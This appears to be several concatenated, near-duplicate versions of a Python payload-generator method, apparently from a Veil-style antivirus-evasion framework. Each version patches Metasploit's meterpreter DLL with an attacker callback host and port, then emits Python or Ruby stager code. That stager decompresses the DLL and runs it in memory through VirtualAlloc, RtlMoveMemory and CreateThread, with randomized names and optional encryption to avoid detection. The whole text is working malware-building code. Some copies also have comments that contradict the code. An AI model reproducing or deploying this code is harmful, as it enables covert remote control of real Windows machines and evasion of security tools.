def generate(self): if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"): metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll" else: print "[*] Error: You either do not have the latest version of Metasploit or" print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file." print "[*] Error: Please fix either issue then select this payload again!" sys.exit() f = open(metsrvPath, 'rb') meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):] # patch the metsrv.dll header headerPatch = helpers.selfcontained_patch() meterpreterDll = dllReplace(meterpreterDll,0,headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTP\x00" meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00" meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661)) expirationTimeout = struct.pack('<I', 604800) meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f)) communicationTimeout = struct.pack('<I', 300) meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" randVarName = helpers.randomString() randFuncName = helpers.randomString() payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName+"()\n" # VirtualAlloc() injection else: payloadCode += 'import ctypes,base64,zlib\n' randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() randPtr = helpers.randomString() randBuf = helpers.randomString() randHt = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n" payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n' payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n' payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): # lambda function used for patching the metsvc.dll dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):] # patch the metsrv.dll header meterpreterDll, headerPatch = helpers.selfcontained_patch() meterpreterDll = dllReplace(meterpreterDll,0,headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTP\x00" meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00" meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661)) expirationTimeout = struct.pack('<I', 604800) meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f)) communicationTimeout = struct.pack('<I', 300) meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" randVarName = helpers.randomString() randFuncName = helpers.randomString() payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName+"()\n" # VirtualAlloc() injection else: payloadCode += 'import ctypes,base64,zlib\n' randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() randPtr = helpers.randomString() randBuf = helpers.randomString() randHt = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n" payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n' payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n' payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"): metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll" else: print "[*] Error: You either do not have the latest version of Metasploit or" print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file." print "[*] Error: Please fix either issue then select this payload again!" sys.exit() f = open(metsrvPath, 'rb') meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):] # patch the metsrv.dll header headerPatch = helpers.selfcontained_patch() meterpreterDll = dllReplace(meterpreterDll,0,headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTPS\x00" meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00" meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661)) expirationTimeout = struct.pack('<I', 604800) meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f)) communicationTimeout = struct.pack('<I', 300) meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n" payloadCode += "exit if Object.const_defined?(:Ocra)\n" # randomly generate out variable names payloadName = helpers.randomString().lower() ptrName = helpers.randomString().lower() threadName = helpers.randomString().lower() Shellcode = helpers.randomString().lower() randInflateFuncName = helpers.randomString().lower() randb64stringName = helpers.randomString().lower() randVarName = helpers.randomString().lower() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+")\n" payloadCode += " " + randVarName + " = Base64.decode64("+randb64stringName+")\n" payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n" payloadCode += " buf = zstream.inflate("+ randVarName +")\n" payloadCode += " zstream.finish\n" payloadCode += " zstream.close\n" payloadCode += " return buf\n" payloadCode += "end\n\n" payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n" payloadCode += "%s = %s\n" %(payloadName, Shellcode) payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName) payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName) return payloadCode
def generate(self): if os.path.exists( settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll" ): metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll" else: print "[*] Error: You either do not have the latest version of Metasploit or" print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file." print "[*] Error: Please fix either issue then select this payload again!" sys.exit() f = open(metsrvPath, 'rb') meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s):] # patch the metsrv.dll header headerPatch = helpers.selfcontained_patch() meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTPS\x00" meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = "https://" + self.required_options['LHOST'][0] + ":" + str( self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum( ) + "_" + helpers.randomString(16) + "/\x00" meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index( struct.pack('<I', 0xb64be661)) expirationTimeout = struct.pack('<I', 604800) meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index( struct.pack('<I', 0xaf79257f)) communicationTimeout = struct.pack('<I', 300) meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n" payloadCode += "exit if Object.const_defined?(:Ocra)\n" # randomly generate out variable names payloadName = helpers.randomString().lower() ptrName = helpers.randomString().lower() threadName = helpers.randomString().lower() Shellcode = helpers.randomString().lower() randInflateFuncName = helpers.randomString().lower() randb64stringName = helpers.randomString().lower() randVarName = helpers.randomString().lower() # deflate function payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n" payloadCode += " " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n" payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n" payloadCode += " buf = zstream.inflate(" + randVarName + ")\n" payloadCode += " zstream.finish\n" payloadCode += " zstream.close\n" payloadCode += " return buf\n" payloadCode += "end\n\n" payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n" payloadCode += "%s = %s\n" % (payloadName, Shellcode) payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % ( ptrName, payloadName, payloadName) payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" % ( ptrName, payloadName, payloadName, threadName, ptrName, threadName) return payloadCode
def generate(self): # lambda function used for patching the metsvc.dll dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :] # patch the metsrv.dll header meterpreterDll, headerPatch = helpers.selfcontained_patch() meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTP\x00" meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = ( "http://" + self.required_options["LHOST"][0] + ":" + str(self.required_options["LPORT"][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00" ) meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661)) expirationTimeout = struct.pack("<I", 604800) meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F)) communicationTimeout = struct.pack("<I", 300) meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" payloadCode = ( "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n" ) payloadCode += "exit if Object.const_defined?(:Ocra)\n" # randomly generate out variable names payloadName = helpers.randomString().lower() ptrName = helpers.randomString().lower() threadName = helpers.randomString().lower() Shellcode = helpers.randomString().lower() randInflateFuncName = helpers.randomString().lower() randb64stringName = helpers.randomString().lower() randVarName = helpers.randomString().lower() # deflate function payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n" payloadCode += " " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n" payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n" payloadCode += " buf = zstream.inflate(" + randVarName + ")\n" payloadCode += " zstream.finish\n" payloadCode += " zstream.close\n" payloadCode += " return buf\n" payloadCode += "end\n\n" payloadCode += Shellcode + " = " + randInflateFuncName + '("' + compressedDll + '")\n' payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n" payloadCode += "%s = %s\n" % (payloadName, Shellcode) payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % ( ptrName, payloadName, payloadName, ) payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" % ( ptrName, payloadName, payloadName, threadName, ptrName, threadName, ) return payloadCode